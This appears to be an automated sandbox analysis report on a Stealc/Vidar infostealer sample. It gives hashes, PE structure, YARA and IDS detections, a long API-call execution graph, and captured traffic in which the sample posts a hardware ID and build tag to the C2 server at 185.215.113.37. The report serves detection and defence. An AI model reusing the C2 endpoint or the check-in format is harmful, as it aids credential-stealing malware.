                | kamilia.kaszowski-401(k) Statement-emailCapstonelogistics.eml | malicious | HTMLPhisher | 13.107.253.45
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                | file.exe | malicious | Stealc | 185.215.113.37
                | file.exe | malicious | Stealc | 185.215.113.37
                | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                | file.exe | malicious | Stealc | 185.215.113.37
                | file.exe | malicious | Stealc | 185.215.113.37
                | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                | file.exe | malicious | Stealc | 185.215.113.37
                | file.exe | malicious | Stealc | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.94879283190591
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'829'888 bytes
                MD5:0346a5b7e84da53552826eb2061eb3de
                SHA1:5a69a7e1fa61bb7f83f46e00616b2f2465891550
                SHA256:077cfebf17a05de67e6bd32828a6710312b4ac28c1475ae4cc3346b8607d254a
                SHA512:afa5a2700299ab217d290bc2be922f4bbc3032f0293f6eea672a729fe98707c1f81116ebf1996c834d2330e2e4276463697d7d39b92be243869d25773df45129
                SSDEEP:24576:4CeoLQC8OdMn/rqZwwt7FsqXSJsLUENSg13UCm6iVBYu8QoW8O9wnnBE8u5u:4CeHc8ISPsLFNn3tm6Kbf9CB8
                TLSH:C18533839C3E8E4CC4444F7B25F39FC5F561E4984AEF5F223910B42B9D8AD6B42E416A
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0xa94000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name                                  Virtual Address  Virtual Size  Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                IMAGE_DIRECTORY_ENTRY_IMPORT          0x25d050         0x64          .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x25d1f8         0x8           .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
                (no name)  0x1000           0x25b000      0x22800   a36f9294226645a5240834ff2ca8fd3d  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc      0x25c000         0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata     0x25d000         0x1000        0x200     c60c4959cc8d384ac402730cc6842bb0  False     0.1328125            data                  0.9064079259880791  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (no name)  0x25e000         0x29c000      0x200     654d826e42021f960871ef8bef5ed8ce  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                xxaxmlaz   0x4fa000         0x199000      0x198a00  06550a8ce26b7be54ecff06169020996  False     0.9948426506576935   data                  7.954308030352957   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                mnkxawcp   0x693000         0x1000        0x400     f32a5a6a14a8720986875b4344d6e8c8  False     0.7705078125         data                  6.0839613661045515  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant   0x694000         0x3000        0x2200    8dacdcac4538e09814d5a75858ab0580  False     0.06571691176470588  DOS executable (COM)  0.7695111558506653  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL           Import
                kernel32.dll  lstrcpy
                Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
                2024-10-14T06:53:06.649678+0200  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.5  49704        185.215.113.37  80         TCP
                Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                Oct 14, 2024 06:53:05.623189926 CEST  49704        80         192.168.2.5     185.215.113.37
                Oct 14, 2024 06:53:05.628061056 CEST  80           49704      185.215.113.37  192.168.2.5
                Oct 14, 2024 06:53:05.628159046 CEST  49704        80         192.168.2.5     185.215.113.37
                Oct 14, 2024 06:53:05.628458023 CEST  49704        80         192.168.2.5     185.215.113.37
                Oct 14, 2024 06:53:05.633218050 CEST  80           49704      185.215.113.37  192.168.2.5
                Oct 14, 2024 06:53:06.328778028 CEST  80           49704      185.215.113.37  192.168.2.5
                Oct 14, 2024 06:53:06.329159975 CEST  49704        80         192.168.2.5     185.215.113.37
                Oct 14, 2024 06:53:06.421540976 CEST  49704        80         192.168.2.5     185.215.113.37
                Oct 14, 2024 06:53:06.426470995 CEST  80           49704      185.215.113.37  192.168.2.5
                Oct 14, 2024 06:53:06.649586916 CEST  80           49704      185.215.113.37  192.168.2.5
                Oct 14, 2024 06:53:06.649677992 CEST  49704        80         192.168.2.5     185.215.113.37
                Oct 14, 2024 06:53:09.882179976 CEST  49704        80         192.168.2.5     185.215.113.37
                Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                                           CName                                 Address        Type                    Class        DNS over HTTPS
                Oct 14, 2024 06:53:14.622353077 CEST  1.1.1.1    192.168.2.5  0x1a14    No error (0)  shed.dual-low.s-part-0017.t-0009.t-msedge.net  azurefd-t-fb-prod.trafficmanager.net  -              CNAME (Canonical name)  IN (0x0001)  false
                Oct 14, 2024 06:53:14.622353077 CEST  1.1.1.1    192.168.2.5  0x1a14    No error (0)  dual.s-part-0017.t-0009.fb-t-msedge.net        s-part-0017.t-0009.fb-t-msedge.net    -              CNAME (Canonical name)  IN (0x0001)  false
                Oct 14, 2024 06:53:14.622353077 CEST  1.1.1.1    192.168.2.5  0x1a14    No error (0)  s-part-0017.t-0009.fb-t-msedge.net             -                                     13.107.253.45  A (IP address)          IN (0x0001)  false
                • 185.215.113.37
                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                0           192.168.2.5  49704        185.215.113.37  80                5004  C:\Users\user\Desktop\file.exe
                Timestamp  Bytes transferred  Direction  Data
                Oct 14, 2024 06:53:05.628458023 CEST  89  OUT  GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 14, 2024 06:53:06.328778028 CEST  203  IN  HTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 04:53:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 14, 2024 06:53:06.421540976 CEST  412  OUT  POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 43 32 44 30 46 34 45 31 32 42 32 32 32 35 30 36 35 39 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a
                Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"82C2D0F4E12B2225065987------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"doma------DGDBKFBAKFBFHIECFBFI--
                Oct 14, 2024 06:53:06.649586916 CEST  210  IN  HTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 04:53:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=



                Target ID:0
                Start time:00:53:00
                Start date:14/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x620000
                File size:1'829'888 bytes
                MD5 hash:0346A5B7E84DA53552826EB2061EB3DE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:7.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.9%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:25
14545 6245c0 2 API calls 14544->14545 14546 62420c 14545->14546 14547 6245c0 2 API calls 14546->14547 14548 624225 14547->14548 14549 6245c0 2 API calls 14548->14549 14550 62423e 14549->14550 14551 6245c0 2 API calls 14550->14551 14552 624257 14551->14552 14553 6245c0 2 API calls 14552->14553 14554 624270 14553->14554 14555 6245c0 2 API calls 14554->14555 14556 624289 14555->14556 14557 6245c0 2 API calls 14556->14557 14558 6242a2 14557->14558 14559 6245c0 2 API calls 14558->14559 14560 6242bb 14559->14560 14561 6245c0 2 API calls 14560->14561 14562 6242d4 14561->14562 14563 6245c0 2 API calls 14562->14563 14564 6242ed 14563->14564 14565 6245c0 2 API calls 14564->14565 14566 624306 14565->14566 14567 6245c0 2 API calls 14566->14567 14568 62431f 14567->14568 14569 6245c0 2 API calls 14568->14569 14570 624338 14569->14570 14571 6245c0 2 API calls 14570->14571 14572 624351 14571->14572 14573 6245c0 2 API calls 14572->14573 14574 62436a 14573->14574 14575 6245c0 2 API calls 14574->14575 14576 624383 14575->14576 14577 6245c0 2 API calls 14576->14577 14578 62439c 14577->14578 14579 6245c0 2 API calls 14578->14579 14580 6243b5 14579->14580 14581 6245c0 2 API calls 14580->14581 14582 6243ce 14581->14582 14583 6245c0 2 API calls 14582->14583 14584 6243e7 14583->14584 14585 6245c0 2 API calls 14584->14585 14586 624400 14585->14586 14587 6245c0 2 API calls 14586->14587 14588 624419 14587->14588 14589 6245c0 2 API calls 14588->14589 14590 624432 14589->14590 14591 6245c0 2 API calls 14590->14591 14592 62444b 14591->14592 14593 6245c0 2 API calls 14592->14593 14594 624464 14593->14594 14595 6245c0 2 API calls 14594->14595 14596 62447d 14595->14596 14597 6245c0 2 API calls 14596->14597 14598 624496 14597->14598 14599 6245c0 2 API calls 14598->14599 14600 6244af 14599->14600 14601 6245c0 2 API calls 14600->14601 14602 6244c8 14601->14602 14603 6245c0 2 API calls 14602->14603 14604 6244e1 14603->14604 14605 6245c0 2 API calls 14604->14605 14606 6244fa 14605->14606 14607 6245c0 2 
API calls 14606->14607 14608 624513 14607->14608 14609 6245c0 2 API calls 14608->14609 14610 62452c 14609->14610 14611 6245c0 2 API calls 14610->14611 14612 624545 14611->14612 14613 6245c0 2 API calls 14612->14613 14614 62455e 14613->14614 14615 6245c0 2 API calls 14614->14615 14616 624577 14615->14616 14617 6245c0 2 API calls 14616->14617 14618 624590 14617->14618 14619 6245c0 2 API calls 14618->14619 14620 6245a9 14619->14620 14621 639c10 14620->14621 14622 639c20 43 API calls 14621->14622 14623 63a036 8 API calls 14621->14623 14622->14623 14624 63a146 14623->14624 14625 63a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14623->14625 14626 63a153 8 API calls 14624->14626 14627 63a216 14624->14627 14625->14624 14626->14627 14628 63a298 14627->14628 14629 63a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14627->14629 14630 63a337 14628->14630 14631 63a2a5 6 API calls 14628->14631 14629->14628 14632 63a344 9 API calls 14630->14632 14633 63a41f 14630->14633 14631->14630 14632->14633 14634 63a4a2 14633->14634 14635 63a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14633->14635 14636 63a4ab GetProcAddress GetProcAddress 14634->14636 14637 63a4dc 14634->14637 14635->14634 14636->14637 14638 63a515 14637->14638 14639 63a4e5 GetProcAddress GetProcAddress 14637->14639 14640 63a612 14638->14640 14641 63a522 10 API calls 14638->14641 14639->14638 14642 63a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14640->14642 14643 63a67d 14640->14643 14641->14640 14642->14643 14644 63a686 GetProcAddress 14643->14644 14645 63a69e 14643->14645 14644->14645 14646 63a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14645->14646 14647 635ca3 14645->14647 14646->14647 14648 621590 14647->14648 15770 621670 14648->15770 14651 63a7a0 lstrcpy 14652 6215b5 14651->14652 14653 63a7a0 lstrcpy 14652->14653 14654 6215c7 14653->14654 14655 63a7a0 lstrcpy 14654->14655 14656 
6215d9 14655->14656 14657 63a7a0 lstrcpy 14656->14657 14658 621663 14657->14658 14659 635510 14658->14659 14660 635521 14659->14660 14661 63a820 2 API calls 14660->14661 14662 63552e 14661->14662 14663 63a820 2 API calls 14662->14663 14664 63553b 14663->14664 14665 63a820 2 API calls 14664->14665 14666 635548 14665->14666 14667 63a740 lstrcpy 14666->14667 14668 635555 14667->14668 14669 63a740 lstrcpy 14668->14669 14670 635562 14669->14670 14671 63a740 lstrcpy 14670->14671 14672 63556f 14671->14672 14673 63a740 lstrcpy 14672->14673 14713 63557c 14673->14713 14674 63a7a0 lstrcpy 14674->14713 14675 63a740 lstrcpy 14675->14713 14676 635643 StrCmpCA 14676->14713 14677 6356a0 StrCmpCA 14678 6357dc 14677->14678 14677->14713 14679 63a8a0 lstrcpy 14678->14679 14680 6357e8 14679->14680 14681 63a820 2 API calls 14680->14681 14683 6357f6 14681->14683 14682 63a820 lstrlen lstrcpy 14682->14713 14685 63a820 2 API calls 14683->14685 14684 635856 StrCmpCA 14686 635991 14684->14686 14684->14713 14688 635805 14685->14688 14687 63a8a0 lstrcpy 14686->14687 14689 63599d 14687->14689 14690 621670 lstrcpy 14688->14690 14692 63a820 2 API calls 14689->14692 14711 635811 14690->14711 14691 621590 lstrcpy 14691->14713 14693 6359ab 14692->14693 14696 63a820 2 API calls 14693->14696 14694 635a0b StrCmpCA 14697 635a16 Sleep 14694->14697 14698 635a28 14694->14698 14695 6352c0 25 API calls 14695->14713 14699 6359ba 14696->14699 14697->14713 14700 63a8a0 lstrcpy 14698->14700 14701 621670 lstrcpy 14699->14701 14702 635a34 14700->14702 14701->14711 14703 63a820 2 API calls 14702->14703 14705 635a43 14703->14705 14704 6351f0 20 API calls 14704->14713 14706 63a820 2 API calls 14705->14706 14707 635a52 14706->14707 14710 621670 lstrcpy 14707->14710 14708 63a8a0 lstrcpy 14708->14713 14709 63578a StrCmpCA 14709->14713 14710->14711 14711->13766 14712 63593f StrCmpCA 14712->14713 14713->14674 14713->14675 14713->14676 14713->14677 14713->14682 14713->14684 14713->14691 14713->14694 14713->14695 
14713->14704 14713->14708 14713->14709 14713->14712 14715 637553 GetVolumeInformationA 14714->14715 14716 63754c 14714->14716 14717 637591 14715->14717 14716->14715 14718 6375fc GetProcessHeap RtlAllocateHeap 14717->14718 14719 637619 14718->14719 14720 637628 wsprintfA 14718->14720 14721 63a740 lstrcpy 14719->14721 14722 63a740 lstrcpy 14720->14722 14723 635da7 14721->14723 14722->14723 14723->13787 14725 63a7a0 lstrcpy 14724->14725 14726 624899 14725->14726 15779 6247b0 14726->15779 14728 6248a5 14729 63a740 lstrcpy 14728->14729 14730 6248d7 14729->14730 14731 63a740 lstrcpy 14730->14731 14732 6248e4 14731->14732 14733 63a740 lstrcpy 14732->14733 14734 6248f1 14733->14734 14735 63a740 lstrcpy 14734->14735 14736 6248fe 14735->14736 14737 63a740 lstrcpy 14736->14737 14738 62490b InternetOpenA StrCmpCA 14737->14738 14739 624944 14738->14739 14740 624955 14739->14740 14741 624ecb InternetCloseHandle 14739->14741 15790 638b60 14740->15790 14743 624ee8 14741->14743 15785 629ac0 CryptStringToBinaryA 14743->15785 14744 624963 15798 63a920 14744->15798 14747 624976 14749 63a8a0 lstrcpy 14747->14749 14754 62497f 14749->14754 14750 63a820 2 API calls 14751 624f05 14750->14751 14752 63a9b0 4 API calls 14751->14752 14755 624f1b 14752->14755 14753 624f27 ctype 14757 63a7a0 lstrcpy 14753->14757 14758 63a9b0 4 API calls 14754->14758 14756 63a8a0 lstrcpy 14755->14756 14756->14753 14770 624f57 14757->14770 14759 6249a9 14758->14759 14760 63a8a0 lstrcpy 14759->14760 14761 6249b2 14760->14761 14762 63a9b0 4 API calls 14761->14762 14763 6249d1 14762->14763 14764 63a8a0 lstrcpy 14763->14764 14765 6249da 14764->14765 14766 63a920 3 API calls 14765->14766 14767 6249f8 14766->14767 14768 63a8a0 lstrcpy 14767->14768 14769 624a01 14768->14769 14771 63a9b0 4 API calls 14769->14771 14770->13790 14772 624a20 14771->14772 14773 63a8a0 lstrcpy 14772->14773 14774 624a29 14773->14774 14775 63a9b0 4 API calls 14774->14775 14776 624a48 14775->14776 14777 63a8a0 lstrcpy 14776->14777 14778 624a51 
14777->14778 14779 63a9b0 4 API calls 14778->14779 14780 624a7d 14779->14780 14781 63a920 3 API calls 14780->14781 14782 624a84 14781->14782 14783 63a8a0 lstrcpy 14782->14783 14784 624a8d 14783->14784 14785 624aa3 InternetConnectA 14784->14785 14785->14741 14786 624ad3 HttpOpenRequestA 14785->14786 14788 624b28 14786->14788 14789 624ebe InternetCloseHandle 14786->14789 14790 63a9b0 4 API calls 14788->14790 14789->14741 14791 624b3c 14790->14791 14792 63a8a0 lstrcpy 14791->14792 14793 624b45 14792->14793 14794 63a920 3 API calls 14793->14794 14795 624b63 14794->14795 14796 63a8a0 lstrcpy 14795->14796 14797 624b6c 14796->14797 14798 63a9b0 4 API calls 14797->14798 14799 624b8b 14798->14799 14800 63a8a0 lstrcpy 14799->14800 14801 624b94 14800->14801 14802 63a9b0 4 API calls 14801->14802 14803 624bb5 14802->14803 14804 63a8a0 lstrcpy 14803->14804 14805 624bbe 14804->14805 14806 63a9b0 4 API calls 14805->14806 14807 624bde 14806->14807 14808 63a8a0 lstrcpy 14807->14808 14809 624be7 14808->14809 14810 63a9b0 4 API calls 14809->14810 14811 624c06 14810->14811 14812 63a8a0 lstrcpy 14811->14812 14813 624c0f 14812->14813 14814 63a920 3 API calls 14813->14814 14815 624c2d 14814->14815 14816 63a8a0 lstrcpy 14815->14816 14817 624c36 14816->14817 14818 63a9b0 4 API calls 14817->14818 14819 624c55 14818->14819 14820 63a8a0 lstrcpy 14819->14820 14821 624c5e 14820->14821 14822 63a9b0 4 API calls 14821->14822 14823 624c7d 14822->14823 14824 63a8a0 lstrcpy 14823->14824 14825 624c86 14824->14825 14826 63a920 3 API calls 14825->14826 14827 624ca4 14826->14827 14828 63a8a0 lstrcpy 14827->14828 14829 624cad 14828->14829 14830 63a9b0 4 API calls 14829->14830 14831 624ccc 14830->14831 14832 63a8a0 lstrcpy 14831->14832 14833 624cd5 14832->14833 14834 63a9b0 4 API calls 14833->14834 14835 624cf6 14834->14835 14836 63a8a0 lstrcpy 14835->14836 14837 624cff 14836->14837 14838 63a9b0 4 API calls 14837->14838 14839 624d1f 14838->14839 14840 63a8a0 lstrcpy 14839->14840 14841 624d28 14840->14841 
14842 63a9b0 4 API calls 14841->14842 14843 624d47 14842->14843 14844 63a8a0 lstrcpy 14843->14844 14845 624d50 14844->14845 14846 63a920 3 API calls 14845->14846 14847 624d6e 14846->14847 14848 63a8a0 lstrcpy 14847->14848 14849 624d77 14848->14849 14850 63a740 lstrcpy 14849->14850 14851 624d92 14850->14851 14852 63a920 3 API calls 14851->14852 14853 624db3 14852->14853 14854 63a920 3 API calls 14853->14854 14855 624dba 14854->14855 14856 63a8a0 lstrcpy 14855->14856 14857 624dc6 14856->14857 14858 624de7 lstrlen 14857->14858 14859 624dfa 14858->14859 14860 624e03 lstrlen 14859->14860 15804 63aad0 14860->15804 14862 624e13 HttpSendRequestA 14863 624e32 InternetReadFile 14862->14863 14864 624e67 InternetCloseHandle 14863->14864 14869 624e5e 14863->14869 14867 63a800 14864->14867 14866 63a9b0 4 API calls 14866->14869 14867->14789 14868 63a8a0 lstrcpy 14868->14869 14869->14863 14869->14864 14869->14866 14869->14868 15806 63aad0 14870->15806 14872 6317c4 StrCmpCA 14873 6317d7 14872->14873 14874 6317cf ExitProcess 14872->14874 14875 6318cf StrCmpCA 14873->14875 14876 6318ad StrCmpCA 14873->14876 14877 631913 StrCmpCA 14873->14877 14878 631932 StrCmpCA 14873->14878 14879 6318f1 StrCmpCA 14873->14879 14880 631951 StrCmpCA 14873->14880 14881 631970 StrCmpCA 14873->14881 14882 63187f StrCmpCA 14873->14882 14883 63185d StrCmpCA 14873->14883 14884 6319c2 14873->14884 14885 63a820 lstrlen lstrcpy 14873->14885 14875->14873 14876->14873 14877->14873 14878->14873 14879->14873 14880->14873 14881->14873 14882->14873 14883->14873 14884->13792 14885->14873 14887 63a7a0 lstrcpy 14886->14887 14888 625979 14887->14888 14889 6247b0 2 API calls 14888->14889 14890 625985 14889->14890 14891 63a740 lstrcpy 14890->14891 14892 6259ba 14891->14892 14893 63a740 lstrcpy 14892->14893 14894 6259c7 14893->14894 14895 63a740 lstrcpy 14894->14895 14896 6259d4 14895->14896 14897 63a740 lstrcpy 14896->14897 14898 6259e1 14897->14898 14899 63a740 lstrcpy 14898->14899 14900 6259ee InternetOpenA StrCmpCA 
14899->14900 14901 625a1d 14900->14901 14902 625fc3 InternetCloseHandle 14901->14902 14904 638b60 3 API calls 14901->14904 14903 625fe0 14902->14903 14907 629ac0 4 API calls 14903->14907 14905 625a3c 14904->14905 14906 63a920 3 API calls 14905->14906 14908 625a4f 14906->14908 14909 625fe6 14907->14909 14910 63a8a0 lstrcpy 14908->14910 14911 63a820 2 API calls 14909->14911 14913 62601f ctype 14909->14913 14915 625a58 14910->14915 14912 625ffd 14911->14912 14914 63a9b0 4 API calls 14912->14914 14917 63a7a0 lstrcpy 14913->14917 14916 626013 14914->14916 14919 63a9b0 4 API calls 14915->14919 14918 63a8a0 lstrcpy 14916->14918 14927 62604f 14917->14927 14918->14913 14920 625a82 14919->14920 14921 63a8a0 lstrcpy 14920->14921 14922 625a8b 14921->14922 14923 63a9b0 4 API calls 14922->14923 14924 625aaa 14923->14924 14925 63a8a0 lstrcpy 14924->14925 14926 625ab3 14925->14926 14928 63a920 3 API calls 14926->14928 14927->13798 14929 625ad1 14928->14929 14930 63a8a0 lstrcpy 14929->14930 14931 625ada 14930->14931 14932 63a9b0 4 API calls 14931->14932 14933 625af9 14932->14933 14934 63a8a0 lstrcpy 14933->14934 14935 625b02 14934->14935 14936 63a9b0 4 API calls 14935->14936 14937 625b21 14936->14937 14938 63a8a0 lstrcpy 14937->14938 14939 625b2a 14938->14939 14940 63a9b0 4 API calls 14939->14940 14941 625b56 14940->14941 14942 63a920 3 API calls 14941->14942 14943 625b5d 14942->14943 14944 63a8a0 lstrcpy 14943->14944 14945 625b66 14944->14945 14946 625b7c InternetConnectA 14945->14946 14946->14902 14947 625bac HttpOpenRequestA 14946->14947 14949 625fb6 InternetCloseHandle 14947->14949 14950 625c0b 14947->14950 14949->14902 14951 63a9b0 4 API calls 14950->14951 14952 625c1f 14951->14952 14953 63a8a0 lstrcpy 14952->14953 14954 625c28 14953->14954 14955 63a920 3 API calls 14954->14955 14956 625c46 14955->14956 14957 63a8a0 lstrcpy 14956->14957 14958 625c4f 14957->14958 14959 63a9b0 4 API calls 14958->14959 14960 625c6e 14959->14960 14961 63a8a0 lstrcpy 14960->14961 14962 625c77 
14961->14962 14963 63a9b0 4 API calls 14962->14963 14964 625c98 14963->14964 14965 63a8a0 lstrcpy 14964->14965 14966 625ca1 14965->14966 14967 63a9b0 4 API calls 14966->14967 14968 625cc1 14967->14968 14969 63a8a0 lstrcpy 14968->14969 14970 625cca 14969->14970 14971 63a9b0 4 API calls 14970->14971 14972 625ce9 14971->14972 14973 63a8a0 lstrcpy 14972->14973 14974 625cf2 14973->14974 14975 63a920 3 API calls 14974->14975 14976 625d10 14975->14976 14977 63a8a0 lstrcpy 14976->14977 14978 625d19 14977->14978 14979 63a9b0 4 API calls 14978->14979 14980 625d38 14979->14980 14981 63a8a0 lstrcpy 14980->14981 14982 625d41 14981->14982 14983 63a9b0 4 API calls 14982->14983 14984 625d60 14983->14984 14985 63a8a0 lstrcpy 14984->14985 14986 625d69 14985->14986 14987 63a920 3 API calls 14986->14987 14988 625d87 14987->14988 14989 63a8a0 lstrcpy 14988->14989 14990 625d90 14989->14990 14991 63a9b0 4 API calls 14990->14991 14992 625daf 14991->14992 14993 63a8a0 lstrcpy 14992->14993 14994 625db8 14993->14994 14995 63a9b0 4 API calls 14994->14995 14996 625dd9 14995->14996 14997 63a8a0 lstrcpy 14996->14997 14998 625de2 14997->14998 14999 63a9b0 4 API calls 14998->14999 15000 625e02 14999->15000 15001 63a8a0 lstrcpy 15000->15001 15002 625e0b 15001->15002 15003 63a9b0 4 API calls 15002->15003 15004 625e2a 15003->15004 15005 63a8a0 lstrcpy 15004->15005 15006 625e33 15005->15006 15007 63a920 3 API calls 15006->15007 15008 625e54 15007->15008 15009 63a8a0 lstrcpy 15008->15009 15010 625e5d 15009->15010 15011 625e70 lstrlen 15010->15011 15807 63aad0 15011->15807 15013 625e81 lstrlen GetProcessHeap RtlAllocateHeap 15808 63aad0 15013->15808 15015 625eae lstrlen 15016 625ebe 15015->15016 15017 625ed7 lstrlen 15016->15017 15018 625ee7 15017->15018 15019 625ef0 lstrlen 15018->15019 15020 625f04 15019->15020 15021 625f1a lstrlen 15020->15021 15809 63aad0 15021->15809 15023 625f2a HttpSendRequestA 15024 625f35 InternetReadFile 15023->15024 15025 625f6a InternetCloseHandle 15024->15025 15029 625f61 
